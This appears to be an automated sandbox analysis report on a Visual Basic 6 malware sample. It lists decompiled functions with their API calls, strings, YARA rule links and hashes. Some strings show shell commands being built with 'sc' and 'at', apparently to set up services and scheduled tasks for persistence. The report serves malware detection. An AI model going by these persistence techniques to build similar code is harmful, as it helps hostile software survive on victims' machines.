Function 00426720, Relevance: 46.8, APIs: 31, Instructions: 331COMMON

Download Yara Rule

APIs

__vbaOnError.MSVBVM60(00000001,00000000,72A0C33A,7294A3D7), ref: 00426796
__vbaSetSystemError.MSVBVM60(00000000,00000000,?,00000000), ref: 004267C7
__vbaSetSystemError.MSVBVM60(?,?,00000040,?,00000000), ref: 004267DF
__vbaSetSystemError.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 00426804
__vbaSetSystemError.MSVBVM60(?,?,00000014,?,00000000,?,?,?,00000000,?,?,00000040,?,00000000), ref: 00426819
__vbaSetSystemError.MSVBVM60(?,?,000000E0,?,00000000,?,?,00000014,?,00000000,?,?,?,00000000,?,?), ref: 00426834
__vbaRedim.MSVBVM60(00000000,00000028,?,00000000,00000001,00000000,00000000,?,?,000000E0,?,00000000,?,?,00000014,?), ref: 00426853
__vbaAryLock.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 00426867
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426887
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004268A7
__vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000,?,?,00000040,?,00000000), ref: 004268D5
__vbaAryUnlock.MSVBVM60(?,?,?,00000040,?,00000000), ref: 004268DE
__vbaUbound.MSVBVM60(00000001,?,?,?,00000040,?,00000000), ref: 004268F8
__vbaI2I4.MSVBVM60(?,?,00000040,?,00000000), ref: 00426900
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426936
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426946
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426962
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426972
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004269A5
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004269B5
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004269FD
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A0D
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A33
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A43
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A69
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A79
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426A95
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00426AA2
__vbaExitProc.MSVBVM60(?,?,00000040,?,00000000), ref: 00426ACD
__vbaAryDestruct.MSVBVM60(00000000,?,00426AF5), ref: 00426AEE
__vbaErrorOverflow.MSVBVM60(?,00000000,?,?,00000040,?,00000000), ref: 00426B0B

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$BoundsGenerate$System$DestructExitLockOverflowProcRedimUboundUnlock
String ID:
API String ID: 2234381736-0
Opcode ID: 8a3a9e375456d3784734aa077d45e81f9f694a82a56cb0dbdfd646f6f7379c76
Instruction ID: 8bb1792076bedc514fb8fc9f35066fd02f5cb142c2b8cf4fa96dc0b38f9b19a4
Opcode Fuzzy Hash: 8a3a9e375456d3784734aa077d45e81f9f694a82a56cb0dbdfd646f6f7379c76
Instruction Fuzzy Hash: 6FC17F71E001299BCF14DFA8D980AEEBBB5FF48304FA1819AD405B7240D775AD82CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041F5C0, Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,0040B976,00000000), ref: 0041F5DE
__vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041F60B
__vbaFixstrConstruct.MSVBVM60(00000100,?,?,?,?,00000000,Function_000032B6), ref: 0041F61A
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F629
__vbaStrToAnsi.MSVBVM60(00000001,Microsoft Internet Explorer,00000001,00000000,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041F647
__vbaSetSystemError.MSVBVM60(00000000,?,?,?,00000000,Function_000032B6), ref: 0041F656
__vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041F665
__vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,80000000,00000000), ref: 0041F696
__vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041F6A9
__vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F6B7
__vbaFreeStr.MSVBVM60 ref: 0041F6C6
__vbaStrToAnsi.MSVBVM60(?,?,00000100,?), ref: 0041F6F5
__vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041F705
__vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F713
__vbaLsetFixstr.MSVBVM60(00000000,?,00000000), ref: 0041F720
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041F730
__vbaStrToAnsi.MSVBVM60(?,?,00000100,00000000), ref: 0041F75E
__vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041F76E
__vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F77C
__vbaLsetFixstr.MSVBVM60(00000000,?,00000000), ref: 0041F789
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041F799
__vbaSetSystemError.MSVBVM60(00000000), ref: 0041F7B4
__vbaSetSystemError.MSVBVM60(00000000), ref: 0041F7CA
__vbaFreeStr.MSVBVM60(0041F811), ref: 0041F801
__vbaFreeStr.MSVBVM60 ref: 0041F80A

Strings

Microsoft Internet Explorer, xrefs: 0041F63E

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$FreeSystem$Ansi$FixstrUnicode$ListLset$ChkstkConstructCopy
String ID: Microsoft Internet Explorer
API String ID: 4206449948-3125735337
Opcode ID: cded7575dc80e55b3969bd68fd6dc42ddc0613399f5cdd5ea9fa15ec02432952
Instruction ID: b2079e6668a1cd7a86d62b88bf03b67035dbb3734d396ffb12c1851edfe9c710
Opcode Fuzzy Hash: cded7575dc80e55b3969bd68fd6dc42ddc0613399f5cdd5ea9fa15ec02432952
Instruction Fuzzy Hash: 4561CB75900208EFDB04EFE4EE49FDEBB78AB48705F104169F611B61A0CB746A45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00429340, Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0042935E
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 004293A3
__vbaStrCopy.MSVBVM60(?,?,?,?,Function_000032B6), ref: 004293B8
#712.MSVBVM60(?,file:///,00408114,00000001,000000FF,00000000,?,?,?,?,Function_000032B6), ref: 004293D9
__vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 004293E4
#712.MSVBVM60(?,00409840,00406544,00000001,000000FF,00000000,?,?,?,?,Function_000032B6), ref: 00429405
__vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 00429410
#572.MSVBVM60(00004002), ref: 00429469
__vbaStrMove.MSVBVM60 ref: 00429474
#537.MSVBVM60(00000020), ref: 0042947F
__vbaStrMove.MSVBVM60 ref: 0042948A
__vbaStrMove.MSVBVM60(00000001,000000FF,00000001), ref: 004294B6
__vbaStrMove.MSVBVM60(004097E0,00000000), ref: 004294C8
__vbaStrCat.MSVBVM60(00000000), ref: 004294CF
__vbaStrMove.MSVBVM60 ref: 004294DA
#712.MSVBVM60(?,00000000), ref: 004294E5
__vbaStrMove.MSVBVM60 ref: 004294F0
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0042950C
__vbaStrCopy.MSVBVM60 ref: 0042952E
__vbaFreeStr.MSVBVM60(00429578), ref: 00429571
__vbaErrorOverflow.MSVBVM60 ref: 004295A2

Strings

file:///, xrefs: 004293D0
, xrefs: 00429429

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$#712$CopyErrorFree$#537#572ChkstkListOverflow
String ID: $file:///
API String ID: 1913684286-1087255347
Opcode ID: 10574e520546cbbb49ac820470f987c6e6ae451a19177e6353396db4924bff4d
Instruction ID: b77d49a70da6056938b5249be74374e1b73de407e439ef27e1b36e2e5139af87
Opcode Fuzzy Hash: 10574e520546cbbb49ac820470f987c6e6ae451a19177e6353396db4924bff4d
Instruction Fuzzy Hash: 6E510875E00209EBCB04DFA4DE48BDEBBB5FF08705F208269E512B72A0DB755A45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC69, Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

__vbaSetSystemError.MSVBVM60(?,?,00000020), ref: 0041ECA0

Part of subcall function 0041F150: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041F16E
Part of subcall function 0041F150: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F19E
Part of subcall function 0041F150: #537.MSVBVM60(00000000,?,?,?,00000000,Function_000032B6), ref: 0041F1AD
Part of subcall function 0041F150: #606.MSVBVM60(000000FF,00000008), ref: 0041F1C6
Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F1D1
Part of subcall function 0041F150: __vbaFreeVar.MSVBVM60 ref: 0041F1DA
Part of subcall function 0041F150: __vbaStrToAnsi.MSVBVM60(?,?), ref: 0041F1F5
Part of subcall function 0041F150: __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F201
Part of subcall function 0041F150: __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F20F
Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60 ref: 0041F218
Part of subcall function 0041F150: #537.MSVBVM60(00000000,?,00000001), ref: 0041F22D
Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F238
Part of subcall function 0041F150: __vbaInStr.MSVBVM60(00000000,00000000), ref: 0041F241
Part of subcall function 0041F150: #616.MSVBVM60(?,-00000001), ref: 0041F251
Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F25C
Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60 ref: 0041F265
Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60(0041F2A2), ref: 0041F29B

__vbaStrMove.MSVBVM60(?), ref: 0041ECBB
__vbaStrCmp.MSVBVM60(00408114,?), ref: 0041ECD1
__vbaStrCat.MSVBVM60(00000000,00409A70,?), ref: 0041ECF1
__vbaStrMove.MSVBVM60 ref: 0041ECFC
__vbaStrCmp.MSVBVM60(00000000), ref: 0041ED03
__vbaFreeStr.MSVBVM60 ref: 0041ED1E
__vbaStrCat.MSVBVM60(?,sc ), ref: 0041ED43
__vbaStrMove.MSVBVM60 ref: 0041ED4E
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041ED5C
#600.MSVBVM60(00000008,00000000), ref: 0041ED7B
__vbaFreeStr.MSVBVM60 ref: 0041ED8A
__vbaFreeVar.MSVBVM60 ref: 0041ED96
__vbaStrCat.MSVBVM60(?,sc ), ref: 0041EDAC
__vbaStrMove.MSVBVM60 ref: 0041EDB7
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EDC5
#600.MSVBVM60(00000008,00000000), ref: 0041EDE4
__vbaFreeStr.MSVBVM60 ref: 0041EDF3
__vbaFreeVar.MSVBVM60 ref: 0041EDFF

Part of subcall function 0041A980: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041A99E
Part of subcall function 0041A980: __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0041A9CE
Part of subcall function 0041A980: __vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,00000000,?,00000000,Function_000032B6), ref: 0041A9DF
Part of subcall function 0041A980: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 0041A9EE
Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,00000000,?,00000000,Function_000032B6), ref: 0041AA0A
Part of subcall function 0041A980: __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0041AA44
Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041AA5A
Part of subcall function 0041A980: __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0041AA73
Part of subcall function 0041A980: #525.MSVBVM60(00000104), ref: 0041AA9C
Part of subcall function 0041A980: __vbaStrMove.MSVBVM60 ref: 0041AAA7
Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0041AADE
Part of subcall function 0041A980: __vbaStrToAnsi.MSVBVM60(?,00000000,000001F4), ref: 0041AB38

__vbaSetSystemError.MSVBVM60(00000014,00000000), ref: 0041EE2B
#598.MSVBVM60 ref: 0041EE38
#611.MSVBVM60(00000000), ref: 0041EE47
#661.MSVBVM60(?,00407C78,00000000,40000000,00000008), ref: 0041EE77
#705.MSVBVM60(?,00000004), ref: 0041EE86
__vbaStrMove.MSVBVM60 ref: 0041EE94
__vbaStrCat.MSVBVM60(?,at ), ref: 0041EEB9
__vbaStrMove.MSVBVM60 ref: 0041EEC4
__vbaStrCat.MSVBVM60(004086A8,00000000), ref: 0041EED0
__vbaStrMove.MSVBVM60 ref: 0041EEDB
__vbaStrMove.MSVBVM60(00000000), ref: 0041EEEB
__vbaStrCat.MSVBVM60(00000000), ref: 0041EEF2
__vbaStrMove.MSVBVM60 ref: 0041EEFD
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF0A
__vbaStrMove.MSVBVM60 ref: 0041EF15
__vbaStrCat.MSVBVM60("\\,00000000), ref: 0041EF21
__vbaStrMove.MSVBVM60 ref: 0041EF2C
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF3A
__vbaStrMove.MSVBVM60 ref: 0041EF45
__vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041EF51
__vbaStrMove.MSVBVM60 ref: 0041EF5C
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF6A
__vbaStrMove.MSVBVM60 ref: 0041EF78
__vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041EF84
__vbaStrMove.MSVBVM60 ref: 0041EF92
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF9F
__vbaStrMove.MSVBVM60 ref: 0041EFAD
__vbaStrCat.MSVBVM60(004095E4,00000000), ref: 0041EFB9
#600.MSVBVM60(00000008,00000000), ref: 0041EFD8
__vbaOnError.MSVBVM60(000000FF), ref: 0041F076
__vbaSetSystemError.MSVBVM60(00000000), ref: 0041F099
__vbaSetSystemError.MSVBVM60(?), ref: 0041F0AF
__vbaExitProc.MSVBVM60 ref: 0041F0B5
__vbaFreeStr.MSVBVM60(0041F135), ref: 0041F12E
__vbaErrorOverflow.MSVBVM60 ref: 0041F146

Strings

sc , xrefs: 0041ED3A, 0041EDA3

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Error$Free$System$Ansi$#600$#537Chkstk$#525#598#606#611#616#661#705Construct2CopyExitOverflowProcUnicode
String ID: sc
API String ID: 4194055773-3695712183
Opcode ID: 10bc9b33671cf09b2be45f840a71d39027787730a0e625a90ceabfc0ea0b6571
Instruction ID: 1563775ad5923100dd4d9da9d865aeb77b3bef46a6a949fae2e94889091cf12a
Opcode Fuzzy Hash: 10bc9b33671cf09b2be45f840a71d39027787730a0e625a90ceabfc0ea0b6571
Instruction Fuzzy Hash: 44510875A00219DBDB24EFA0DE49BDD7BB4BB44301F1081A9E14AF72A1DB385E85CF18

Uniqueness

Uniqueness Score: -1.00%

Function 0040D123, Relevance: 39.4, APIs: 26, Instructions: 364COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D164
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,0000004C), ref: 0040D197
__vbaFreeObj.MSVBVM60 ref: 0040D1CF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000728), ref: 0040D22E
__vbaChkstk.MSVBVM60(?), ref: 0040D264
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004077C4,00000020), ref: 0040D2A8
__vbaObjSet.MSVBVM60(?,?), ref: 0040D2DB
__vbaErrorOverflow.MSVBVM60 ref: 0040D522
__vbaOnError.MSVBVM60(00000001), ref: 0040D56C
__vbaNew2.MSVBVM60(00406520,0042CC34), ref: 0040D584
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D5A7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,00000040), ref: 0040D5CB
__vbaObjSet.MSVBVM60(?,?), ref: 0040D5E2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,0000000C), ref: 0040D5F8
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040D608
__vbaExitProc.MSVBVM60 ref: 0040D611

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$ErrorFree$ChkstkExitListNew2OverflowProc
String ID:
API String ID: 435708370-0
Opcode ID: 9749cd1c4f2270137a3b9f12548bda0f3a75b9f7e342ec696e87967a4431a42f
Instruction ID: fcce0bd25021f4c55c21d17dcae381c1af859cd8f25d7f86317db57e57613949
Opcode Fuzzy Hash: 9749cd1c4f2270137a3b9f12548bda0f3a75b9f7e342ec696e87967a4431a42f
Instruction Fuzzy Hash: CEE11774D00208EFDB14DFA4D988ADEBBB5FF48700F20816AE509BB291D7759985CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418D00, Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 221COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,72A26A76,72A26C30,?), ref: 00418D1E
__vbaOnError.MSVBVM60(000000FF,00000000,?,?,?,Function_000032B6,?), ref: 00418D4E
__vbaRecUniToAnsi.MSVBVM60(004054A0,?,?), ref: 00418D6E
__vbaStrI4.MSVBVM60(00000000,00000000), ref: 00418D77
__vbaStrMove.MSVBVM60 ref: 00418D85
__vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00418D93
__vbaStrI4.MSVBVM60(00000000,00000000), ref: 00418D9C
__vbaStrMove.MSVBVM60 ref: 00418DAA
__vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00418DB8
__vbaStrToAnsi.MSVBVM60(?,DISPLAY,00000000), ref: 00418DCB
__vbaSetSystemError.MSVBVM60(00000000), ref: 00418DDD
__vbaRecAnsiToUni.MSVBVM60(004054A0,?,?), ref: 00418DF6
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 00418E2D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,00000084), ref: 00418EAD
__vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,0000008C), ref: 00418F3C
__vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,00000278), ref: 00418FA4
__vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,000000E0), ref: 00419013
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0041905F
__vbaSetSystemError.MSVBVM60(?,?,00CC0020), ref: 00419078
__vbaErrorOverflow.MSVBVM60 ref: 004190C9

Strings

DISPLAY, xrefs: 00418DBF

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$AnsiError$CheckHresult$System$Move$ChkstkFreeListOverflow
String ID: DISPLAY
API String ID: 226413627-865373369
Opcode ID: 6a05cb85e494f777eff56ca68d8a3db58f76e04dcff3142400466dc6ab06a324
Instruction ID: a062e320558ca6fff28f45832f19da439656b4792b9b718fe8d8c950d48b1413
Opcode Fuzzy Hash: 6a05cb85e494f777eff56ca68d8a3db58f76e04dcff3142400466dc6ab06a324
Instruction Fuzzy Hash: 2BA12875940219EFDB24DF50CD89FEAB7B4FB48300F1085EAE50AA7290D7745A84DF64

Uniqueness

Uniqueness Score: -1.00%

Function 0042A090, Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
__vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
__vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
__vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
__vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
__vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
__vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
__vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
__vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
__vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
__vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
__vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
__vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
__vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7
__vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A200

Strings

@2@, xrefs: 0042A0ED

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Error$AnsiCopySystemUnicode$BstrChkstkList
String ID: @2@
API String ID: 653519621-343359795
Opcode ID: f6150098f43948e90806c12a3c2991bf29e9ad6a5940e6859ad760a911545430
Instruction ID: 4db5018945ba0d113f70efc3efbfc2014598e300a345278f9012389ef60e75fd
Opcode Fuzzy Hash: f6150098f43948e90806c12a3c2991bf29e9ad6a5940e6859ad760a911545430
Instruction Fuzzy Hash: B741CCB2900149EFCB04EFE4DE49EDEBBB9EB48705F108159F602B61A0DB756A44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404FF6, Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040D86E
__vbaOnError.MSVBVM60(000000FF,?,00000000,Function_000032B6), ref: 0040D8B5
__vbaStrCat.MSVBVM60( RO,00000000,?,00000000,Function_000032B6), ref: 0040D8ED
__vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 0040D8F8
__vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,00000000,Function_000032B6), ref: 0040D911
__vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 0040D91C
__vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,00000000,Function_000032B6), ref: 0040D937
__vbaStrCat.MSVBVM60( RO,00000000), ref: 0040D952
__vbaStrMove.MSVBVM60(?,?,Function_000032B6), ref: 0040D95D
__vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040D977
__vbaStrMove.MSVBVM60(?,?,Function_000032B6), ref: 0040D982
__vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000), ref: 0040D99D
#580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0F4,00000000,0042C0D4), ref: 0040DA0C
__vbaStrCat.MSVBVM60( MR,00000000,0042C110,0042C114,0042C118,00000000,0042C0D4), ref: 0040DA33
__vbaStrMove.MSVBVM60 ref: 0040DA3E
__vbaFreeStr.MSVBVM60(00000000), ref: 0040DA4D

Strings

Once, xrefs: 0040D90C, 0040D972
C, xrefs: 00404FF6
MR, xrefs: 0040DA2E
RO, xrefs: 0040D8E8, 0040D94D

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Free$List$#580ChkstkError
String ID: MR$ RO$C$Once
API String ID: 3619039755-2541133078
Opcode ID: 51f8670c5577a9d60adca4f5475f3347c83c433d099adc03e5839f88fcd5abb2
Instruction ID: cb69084c84231b04a80139a54d6e55147a6181afad02e942266a88f85e06280e
Opcode Fuzzy Hash: 51f8670c5577a9d60adca4f5475f3347c83c433d099adc03e5839f88fcd5abb2
Instruction Fuzzy Hash: 67515C71A00204EFD700DFD4DE8ABAE77B4EF48704F60816AF501B72A1DBB85A45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00415D20, Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

__vbaStrCat.MSVBVM60( !@,00409278,?,00000001), ref: 00415D70
__vbaStrMove.MSVBVM60(?,00000001), ref: 00415D7D
__vbaStrCat.MSVBVM60(00409280,00000000,?,00000001), ref: 00415D85
__vbaStrMove.MSVBVM60(?,00000001), ref: 00415D8C
__vbaInStr.MSVBVM60(00000000,00000000,?,00000001), ref: 00415D90
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000001), ref: 00415DA2
__vbaStrCat.MSVBVM60( !@,004095AC,?,-00000001), ref: 00415DD0
__vbaStrMove.MSVBVM60(?,-00000001), ref: 00415DD7
__vbaStrCat.MSVBVM60(00409280,00000000,?,-00000001), ref: 00415DDF
__vbaStrMove.MSVBVM60(?,-00000001), ref: 00415DE6
__vbaInStr.MSVBVM60(00000000,00000000,?,-00000001), ref: 00415DEB
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,-00000001), ref: 00415DFD
__vbaLenBstr.MSVBVM60 ref: 00415E10
__vbaLenBstr.MSVBVM60(?,?), ref: 00415E43
#631.MSVBVM60(?,-00000002,?,?), ref: 00415E59
__vbaStrMove.MSVBVM60(?,-00000002,?,?), ref: 00415E64
__vbaFreeVar.MSVBVM60(?,-00000002,?,?), ref: 00415E69
__vbaErrorOverflow.MSVBVM60 ref: 00415EB9

Strings

AHA !@, xrefs: 00415D4C, 00415DC4, 00415E0A, 00415E16
!@, xrefs: 00415D49, 00415DB3, 00415E53, 00415D63, 00415DCF

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
